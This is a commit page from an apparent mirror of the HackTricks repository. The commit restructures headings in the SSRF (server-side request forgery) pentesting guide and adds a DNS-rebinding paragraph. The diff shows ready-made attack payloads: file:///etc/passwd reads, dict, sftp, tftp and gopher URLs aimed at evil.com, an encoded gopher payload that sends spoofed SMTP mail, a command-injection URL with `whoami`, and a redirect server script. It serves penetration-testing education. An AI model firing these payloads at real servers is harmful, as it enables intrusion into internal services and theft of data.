0x22bb
/
hacktricks
mirror of https://github.com/carlospolop/hacktricks.git
1
2
Fork 0
Code Releases Activity

GitBook: [#3148] No subject

This commit is contained in:
CPol 2022-04-29 15:47:17 +00:00 committed by gitbook-bot
parent 23500ef90a
commit 575358df8c
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
1 changed files with 38 additions and 34 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

72
pentesting-web/ssrf-server-side-request-forgery/README.md
View File

@ -1,4 +1,4 @@
# SSRF (Server Side Request Forgery)
<details>
@ -16,14 +16,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
# SSRF (Server Side Request Forgery)
## What is Server Side Request Forgery?
Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to **induce the server-side application to make HTTP requests to an arbitrary domain** of the attacker's choosing. (From [here](https://portswigger.net/web-security/ssrf))
## Capture SSRF
### Capture SSRF
The first thing you need to do is to capture a SSRF interaction provoked by you. To capture a HTTP or DNS interaction you can use tools such as:
@ -34,7 +31,7 @@ The first thing you need to do is to capture a SSRF interaction provoked by you.
* [**http://webhook.site**](http://webhook.site)
* [**https://github.com/teknogeek/ssrf-sheriff**](https://github.com/teknogeek/ssrf-sheriff)
## Whitelisted Domains Bypass
### Whitelisted Domains Bypass
Usually you will find that the SSRF is only working in **certain whitelisted domains** or URL. In the following page you have a **compilation of techniques to try to bypass that whitelist**:
@ -42,12 +39,12 @@ Usually you will find that the SSRF is only working in **certain whitelisted dom
[url-format-bypass.md](url-format-bypass.md)
{% endcontent-ref %}
### Bypass via open redirect
#### Bypass via open redirect
If the server is correctly protected you could **bypass all the restrictions by exploiting an Open Redirect inside the web page**. Because the webpage will allow **SSRF to the same domain** and probably will **follow redirects**, you can exploit the **Open Redirect to make the server to access internal any resource**.\
Read more here: [https://portswigger.net/web-security/ssrf](https://portswigger.net/web-security/ssrf)
## SSRF via Referrer header
### SSRF via Referrer header
Some applications employ server-side analytics software that tracks visitors. This software often logs the Referrer header in requests, since this is of particular interest for tracking incoming links. Often the analytics software will actually visit any third-party URL that appears in the Referrer header. This is typically done to analyze the contents of referring sites, including the anchor text that is used in the incoming links. As a result, the Referer header often represents fruitful attack surface for SSRF vulnerabilities.\
To discover this kind of "hidden" vulnerabilities you could use the plugin "**Collaborator Everywhere**" from Burp.
@ -56,13 +53,15 @@ To discover this kind of "hidden" vulnerabilities you could use the plugin "**Co
### [Wget file upload](../file-upload/#wget-file-upload-ssrf-trick)
### file://
### Protocols
#### file://
```
file:///etc/passwd
```
### dict://
#### dict://
The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:
@ -71,7 +70,7 @@ dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
ssrf.php?url=dict://attacker:11111/
```
### SFTP://
#### SFTP://
A network protocol used for secure file transfer over secure shell
@ -79,7 +78,7 @@ A network protocol used for secure file transfer over secure shell
ssrf.php?url=sftp://evil.com:11111/
```
### TFTP://
#### TFTP://
Trivial File Transfer Protocol, works over UDP
@ -87,7 +86,7 @@ Trivial File Transfer Protocol, works over UDP
ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET
```
### LDAP://
#### LDAP://
Lightweight Directory Access Protocol. It is an application protocol used over an IP network to manage and access the distributed directory information service.
@ -95,12 +94,12 @@ Lightweight Directory Access Protocol. It is an application protocol used over a
ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
```
### Gopher://
#### Gopher://
Using this protocol you can specify the **IP, port and bytes** you want the server to **send**. Then, you can basically exploit a SSRF to **communicate with any TCP server** (but you need to know how to talk to the service first).\
Fortunately, you can use [Gopherus](https://github.com/tarunkant/Gopherus) to create payloads for several services. Additionally, [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) can be used to create _gopher_ payloads for _Java RMI_ services.
#### Gopher smtp
**Gopher smtp**
```
ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
@ -117,7 +116,7 @@ Subject: Ah Ah AHYou didn't say the magic word !
QUIT
```
#### Gopher HTTP
**Gopher HTTP**
```bash
#For new lines you can use %0A, %0D%0A
@ -125,7 +124,7 @@ gopher://<server>:8080/_GET / HTTP/1.0%0A%0A
gopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body
```
#### Gopher SMTP — Back connect to 1337
**Gopher SMTP — Back connect to 1337**
{% code title="redirect.php" %}
```php
@ -136,7 +135,7 @@ https://example.com/?q=http://evil.com/redirect.php.
```
{% endcode %}
### SMTP
#### SMTP
From [https://twitter.com/har1sec/status/1182255952055164929](https://twitter.com/har1sec/status/1182255952055164929):\
1\. connect with SSRF on smtp localhost:25\
@ -148,7 +147,7 @@ From [https://twitter.com/har1sec/status/1182255952055164929](https://twitter.co
It might be worth trying a payload like: `` url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami` ``
### Exploiting PDFs Rendering
### PDFs Rendering
If the web page is automatically creating a PDF with some information you have provided, you can **insert some JS that will be executed by the PDF creator** itself (the server) while creating the PDF and you will be able to abuse a SSRF. [**Find more information here**](../xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)**.**
@ -190,7 +189,15 @@ if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
```
### Abusing DNS Rebidding + TLS Session ID/Session ticket
### DNS Rebidding CORS/SOP bypass
If you are having **problems** to **exfiltrate content from a local IP** because of **CORS/SOP**, **DNS Rebidding** can be used to bypass that limitation:
{% content-ref url="../cors-bypass.md" %}
[cors-bypass.md](../cors-bypass.md)
{% endcontent-ref %}
### DNS Rebidding + TLS Session ID/Session ticket
Requirements:
@ -211,21 +218,21 @@ Note that during this attack, if you want to attack localhost:11211 (_memcache_)
To **perform this attack you can use the tool**: [https://github.com/jmdx/TLS-poison/](https://github.com/jmdx/TLS-poison/)\
For **more information** take a look to the talk where this attack is explained: [https://www.youtube.com/watch?v=qGpAJxfADjo\&ab\_channel=DEFCONConference](https://www.youtube.com/watch?v=qGpAJxfADjo\&ab\_channel=DEFCONConference)
### Automated DNS Rebidding
#### Automated DNS Rebidding
**``**[**`Singularity of Origin`**](https://github.com/nccgroup/singularity) is a tool to perform [DNS rebinding](https://en.wikipedia.org/wiki/DNS\_rebinding) attacks. It includes the necessary components to rebind the IP address of the attack server DNS name to the target machine's IP address and to serve attack payloads to exploit vulnerable software on the target machine.
[**`Singularity of Origin`**](https://github.com/nccgroup/singularity) is a tool to perform [DNS rebinding](https://en.wikipedia.org/wiki/DNS\_rebinding) attacks. It includes the necessary components to rebind the IP address of the attack server DNS name to the target machine's IP address and to serve attack payloads to exploit vulnerable software on the target machine.
Check out also the publicly running server in [http://rebind.it/singularity.html](http://rebind.it/singularity.html)
## Blind SSRF
### Blind SSRF
The difference between a blind SSRF and a not blind one is that in the blind you cannot see the response of the SSRF request. Then, it is more difficult to exploit because you will be able to exploit only well-known vulnerabilities.
### Time based SSRF
#### Time based SSRF
**Checking the time** of the responses from the server it might be **possible to know if a resource exists or not** (maybe it takes more time accessing an existing resource than accessing one that doesn't exist)
## Cloud SSRF Exploitation
### Cloud SSRF Exploitation
If you find a SSRF vulnerability in a machine running inside a cloud environment you might be able to obtain interesting information about the cloud environment and even credentials:
@ -233,7 +240,7 @@ If you find a SSRF vulnerability in a machine running inside a cloud environment
[cloud-ssrf.md](cloud-ssrf.md)
{% endcontent-ref %}
## SSRF Vulnerable Platforms
### SSRF Vulnerable Platforms
Several known platforms contains or has contained SSRF vulnerabilities, check them in:
@ -243,11 +250,11 @@ Several known platforms contains or has contained SSRF vulnerabilities, check th
## Tools
### [**SSRFMap**](https://github.com/swisskyrepo/SSRFmap)
#### [**SSRFMap**](https://github.com/swisskyrepo/SSRFmap)
Tool to detect and exploit SSRF vulnerabilities
### [Gopherus](https://github.com/tarunkant/Gopherus)
#### [Gopherus](https://github.com/tarunkant/Gopherus)
* [Blog post on Gopherus](https://spyclub.tech/2018/08/14/2018-08-14-blog-on-gopherus/)
@ -260,17 +267,17 @@ This tool generates Gopher payloads for:
* Zabbix
* Memcache
### [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
#### [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
* [Blog post on SSRF usage](https://blog.tneitzel.eu/posts/01-attacking-java-rmi-via-ssrf/)
_remote-method-guesser_ is a _Java RMI_ vulnerability scanner that supports attack operations for most common _Java RMI_ vulnerabilities. Most of the available operations support the `--ssrf` option, to generate an _SSRF_ payload for the requested operation. Together with the `--gopher` option, ready to use _gopher_ payloads can be generated directly.
### [SSRF Proxy](https://github.com/bcoles/ssrf\_proxy)
#### [SSRF Proxy](https://github.com/bcoles/ssrf\_proxy)
SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP traffic through HTTP servers vulnerable to Server-Side Request Forgery (SSRF).
### To practice
#### To practice
{% embed url="https://github.com/incredibleindishell/SSRF_Vulnerable_Lab" %}
@ -279,7 +286,6 @@ SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP
* [https://medium.com/@pravinponnusamy/ssrf-payloads-f09b2a86a8b4](https://medium.com/@pravinponnusamy/ssrf-payloads-f09b2a86a8b4)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery)
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -295,5 +301,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>